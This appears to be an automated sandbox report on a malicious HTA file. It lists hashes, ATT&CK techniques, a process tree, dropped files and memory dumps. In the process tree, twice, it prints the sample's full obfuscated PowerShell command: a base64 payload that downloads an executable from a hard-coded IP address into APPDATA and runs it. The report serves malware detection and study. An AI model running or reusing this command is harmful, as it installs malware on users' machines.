4fde814d5f352592a5b42c856b41548f1517ee82a1c042b882622ace5a6b06f6

General

Target

IEnetbookupdation.hta
Size

115KB
MD5

3f20ef35e2f63a4e4f0719740bf9deeb
SHA1

6e804455dcf41545ebb533636558481e0da69b8a
SHA256

4fde814d5f352592a5b42c856b41548f1517ee82a1c042b882622ace5a6b06f6
SHA512

b7f959280d4107fbc3f4e2a646f542e2bb55bcde0840848e81c14e5dbf7fd142af337d85eb045d3c7b8686fa568f9f4df6e76a22378d3b6e653199fb5db9cc65
SSDEEP

96:Ea+M7alGgrialG5prPFX7/wZf83kJcAlGo3lGZN5Dr93lGaAT:Ea+QpgWpfRKLeHndaBT

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
16	1604	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
1604	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
1032	dllhost.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000800000002345a-67.dat	autoit_exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2496	1032	WerFault.exe	89

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1604	powershell.exe
1604	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1604	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 3168 wrote to memory of 4328	3168	mshta.exe	84
PID 3168 wrote to memory of 4328	3168	mshta.exe	84
PID 3168 wrote to memory of 4328	3168	mshta.exe	84
PID 4328 wrote to memory of 1604	4328	cmd.exe	86
PID 4328 wrote to memory of 1604	4328	cmd.exe	86
PID 4328 wrote to memory of 1604	4328	cmd.exe	86
PID 1604 wrote to memory of 1948	1604	powershell.exe	87
PID 1604 wrote to memory of 1948	1604	powershell.exe	87
PID 1604 wrote to memory of 1948	1604	powershell.exe	87
PID 1948 wrote to memory of 3840	1948	csc.exe	88
PID 1948 wrote to memory of 3840	1948	csc.exe	88
PID 1948 wrote to memory of 3840	1948	csc.exe	88
PID 1604 wrote to memory of 1032	1604	powershell.exe	89
PID 1604 wrote to memory of 1032	1604	powershell.exe	89
PID 1604 wrote to memory of 1032	1604	powershell.exe	89
PID 1032 wrote to memory of 4212	1032	dllhost.exe	92
PID 1032 wrote to memory of 4212	1032	dllhost.exe	92
PID 1032 wrote to memory of 4212	1032	dllhost.exe	92

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\IEnetbookupdation.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3168
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C PoWErShELL -EX ByPASS -NOp -w 1 -C deVicECrEdEntiAlDEPloYMeNT.exe ; iEX($(IEx('[sYStEm.text.encODinG]'+[ChAR]0X3A+[CHAr]58+'UTf8.gEtSTrIng([systEM.ConvERT]'+[chaR]58+[ChAr]0X3A+'fromBasE64strIng('+[ChAR]34+'JDdZOVg2a1NJMVUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVSRGVGaU5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cVloakVseixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTWE9XUEtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExSbkZTTSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnd6eGdDeU8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU05DQkxtZik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktIYmtPb1MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVzUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlKUnlETnJlRyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN1k5WDZrU0kxVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjkvNzgwL2RsbGhvc3QuZXhlIiwiJGVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJULVNMZUVwKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[Char]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4328
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWErShELL -EX ByPASS -NOp -w 1 -C deVicECrEdEntiAlDEPloYMeNT.exe ; iEX($(IEx('[sYStEm.text.encODinG]'+[ChAR]0X3A+[CHAr]58+'UTf8.gEtSTrIng([systEM.ConvERT]'+[chaR]58+[ChAr]0X3A+'fromBasE64strIng('+[ChAR]34+'JDdZOVg2a1NJMVUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVSRGVGaU5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cVloakVseixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTWE9XUEtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExSbkZTTSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnd6eGdDeU8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU05DQkxtZik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktIYmtPb1MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVzUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlKUnlETnJlRyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN1k5WDZrU0kxVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjkvNzgwL2RsbGhvc3QuZXhlIiwiJGVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJULVNMZUVwKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[Char]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1604
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1zjjtkdu\1zjjtkdu.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1948
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8B1.tmp" "c:\Users\Admin\AppData\Local\Temp\1zjjtkdu\CSC71FDD1AC2F1648009841969D7F48A15.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3840
  - - C:\Users\Admin\AppData\Roaming\dllhost.exe
      "C:\Users\Admin\AppData\Roaming\dllhost.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1032
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Users\Admin\AppData\Roaming\dllhost.exe"
        5⤵
        
        PID:4212
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 740
        5⤵
        Program crash
        
        PID:2496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1032 -ip 1032
1⤵
PID:3968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1zjjtkdu\1zjjtkdu.dll

Filesize
3KB

MD5
3913a1e893a22099d5838c81c70931f0

SHA1
0b011cee5f5e08d5edc6e87f20dc25ea2b617a62

SHA256
24d13370ef7977fb4995bbafa07cbfc59988b737a713a8e7745350a1d52b2e02

SHA512
c636f1fda64a47f054e2ba38d639118d8032ce627a7a0696ef285e306346bd6cb13b69efeb856f1dbafb8f862cad5014af6b1a85e86ab5e8371c8dd6c3d7c696

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB8B1.tmp

Filesize
1KB

MD5
045e5f30bc0b0bc7bdfdc6df63097afd

SHA1
0ae5fe92a9c45b2f6f055f0cef915d5fa7805e53

SHA256
cd700d31f692df72ef48d5e0840bcb67ad83fd3bc921e46e9339fe872124964e

SHA512
b5946535bba5f7704e4823246a858a492eddecab4bfe3ceef6dc854fe84ae01fa1c945dee18e87ab716f8a929601e3b22eb30a4ae18e794045a5f7c2d22ad0d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l53wiqcf.x2c.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
1008KB

MD5
46ce226283fb84a52a6a902fc7032363

SHA1
c3bb1c73525de62dc7756ad40574ad6c6c148996

SHA256
9f3a7c1a4cc7e6e68e610bdce33046edb090a648e362ab8d3df8ba72561e1482

SHA512
36ea4f80512c7b20d1c34406b6bdd77f64831c4569d7cb4418d4904dffdb8d33e3b6e4f37fa2b949449c04569bd1f9dc3dd010027de288ab2f8ac9de02d4f34d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1zjjtkdu\1zjjtkdu.0.cs

Filesize
485B

MD5
526cb8f584c9e67eaad8958503b05f30

SHA1
2c52fac6e929f46dcb4b0cdbeab72cfb806a2c87

SHA256
af9253507cbd12a1875ffc8b02988ef5bccc511c7c77614cb34c5115b42c5b76

SHA512
5552f12bb883f18c7901a8d873eb1beaab9aa2e06a213ab476ef5a21b00faa69ab438261b7612c7be0cbd3d9f6086a1861c4f28ab3df41969d227eabbe0d9619

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1zjjtkdu\1zjjtkdu.cmdline

Filesize
369B

MD5
48974a503268de5a751c8ea278aa66fb

SHA1
07a1e3dd84e44a72873ba2be2ccb42855e931025

SHA256
5c308f4fcc1a1cb3e71d56e0505a00e6629786645c002781a50339fd75f5606c

SHA512
9fbb49dc37ac8ee4dedff03e082377d028a807d28f0df5b629d08dee3ea4ec860db92ea95e70bdd9db16a4cb41f9833a34f2766fc8b64730acd093f3bfab2935

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1zjjtkdu\CSC71FDD1AC2F1648009841969D7F48A15.TMP

Filesize
652B

MD5
573cc59a7b0f2ab2e9835740ee158d33

SHA1
8c0d04bf026808fb8760b49c9e3c208b8b2f1998

SHA256
4272a0354bc85d13bac3f5f42678013940b5b7f7f020addb74fb94ede450e7a3

SHA512
30280fa8e7401841999b65b0cfeaa99367e9af234ad24aa9ad1aedb09bd490d4e040ae4bd567f7045f0052419e8f042588655a5c136c84c3da2f3cc64147b934

Download Submit
memory/1604-19-0x0000000005E40000-0x0000000005E8C000-memory.dmp

Filesize
304KB

Download
memory/1604-41-0x0000000007370000-0x000000000737E000-memory.dmp

Filesize
56KB

Download
memory/1604-10-0x0000000005690000-0x00000000059E4000-memory.dmp

Filesize
3.3MB

Download
memory/1604-0-0x000000007108E000-0x000000007108F000-memory.dmp

Filesize
4KB

Download
memory/1604-18-0x0000000005E00000-0x0000000005E1E000-memory.dmp

Filesize
120KB

Download
memory/1604-21-0x000000006D940000-0x000000006D98C000-memory.dmp

Filesize
304KB

Download
memory/1604-20-0x00000000063D0000-0x0000000006402000-memory.dmp

Filesize
200KB

Download
memory/1604-22-0x0000000071080000-0x0000000071830000-memory.dmp

Filesize
7.7MB

Download
memory/1604-33-0x00000000063B0000-0x00000000063CE000-memory.dmp

Filesize
120KB

Download
memory/1604-34-0x0000000006DE0000-0x0000000006E83000-memory.dmp

Filesize
652KB

Download
memory/1604-23-0x000000006DCE0000-0x000000006E034000-memory.dmp

Filesize
3.3MB

Download
memory/1604-35-0x0000000071080000-0x0000000071830000-memory.dmp

Filesize
7.7MB

Download
memory/1604-36-0x0000000007790000-0x0000000007E0A000-memory.dmp

Filesize
6.5MB

Download
memory/1604-37-0x0000000007150000-0x000000000716A000-memory.dmp

Filesize
104KB

Download
memory/1604-38-0x00000000071C0000-0x00000000071CA000-memory.dmp

Filesize
40KB

Download
memory/1604-39-0x00000000073E0000-0x0000000007476000-memory.dmp

Filesize
600KB

Download
memory/1604-40-0x0000000007340000-0x0000000007351000-memory.dmp

Filesize
68KB

Download
memory/1604-7-0x0000000004F60000-0x0000000004FC6000-memory.dmp

Filesize
408KB

Download
memory/1604-42-0x0000000007380000-0x0000000007394000-memory.dmp

Filesize
80KB

Download
memory/1604-43-0x00000000073C0000-0x00000000073DA000-memory.dmp

Filesize
104KB

Download
memory/1604-44-0x00000000073B0000-0x00000000073B8000-memory.dmp

Filesize
32KB

Download
memory/1604-6-0x0000000004EF0000-0x0000000004F56000-memory.dmp

Filesize
408KB

Download
memory/1604-5-0x0000000004E50000-0x0000000004E72000-memory.dmp

Filesize
136KB

Download
memory/1604-4-0x0000000071080000-0x0000000071830000-memory.dmp

Filesize
7.7MB

Download
memory/1604-3-0x0000000005060000-0x0000000005688000-memory.dmp

Filesize
6.2MB

Download
memory/1604-2-0x0000000071080000-0x0000000071830000-memory.dmp

Filesize
7.7MB

Download
memory/1604-57-0x00000000073B0000-0x00000000073B8000-memory.dmp

Filesize
32KB

Download
memory/1604-63-0x000000007108E000-0x000000007108F000-memory.dmp

Filesize
4KB

Download
memory/1604-64-0x0000000071080000-0x0000000071830000-memory.dmp

Filesize
7.7MB

Download
memory/1604-65-0x0000000007660000-0x0000000007682000-memory.dmp

Filesize
136KB

Download
memory/1604-66-0x00000000083C0000-0x0000000008964000-memory.dmp

Filesize
5.6MB

Download
memory/1604-1-0x0000000002810000-0x0000000002846000-memory.dmp

Filesize
216KB

Download
memory/1604-79-0x0000000071080000-0x0000000071830000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing